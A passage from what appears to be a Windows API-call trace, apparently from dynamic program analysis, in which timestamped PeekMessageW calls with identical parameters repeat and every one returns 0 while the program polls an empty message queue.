wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.117] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.117] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.117] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.117] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.117] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.117] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.117] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.117] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.118] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.118] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.118] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.118] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.118] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.118] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.118] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.118] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.118] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.118] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.118] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.118] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.119] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.119] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.119] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.119] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.119] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.119] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.119] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.119] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.119] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.119] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.119] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.119] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.119] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.119] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.120] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.120] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.120] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.120] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.120] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.120] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.120] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.120] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.120] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.120] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.120] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.120] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.120] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.120] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.121] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.121] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.121] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.121] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.121] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.121] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.121] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.121] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.121] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.121] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.121] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.121] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.121] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.121] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.122] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.122] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.122] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.122] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.122] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.122] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.122] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.122] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.122] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.122] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.122] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.122] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.122] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.122] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.123] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.123] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.123] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.123] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.123] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.123] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.123] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.123] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.123] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.123] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.123] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.123] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.123] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.123] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.124] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.124] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.124] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.124] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.124] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.124] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.124] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.124] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.124] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.124] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.124] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.136] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.137] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.137] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.137] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.137] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.137] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.137] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.137] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.137] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.137] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.137] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.137] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.137] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.137] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.137] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.137] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, 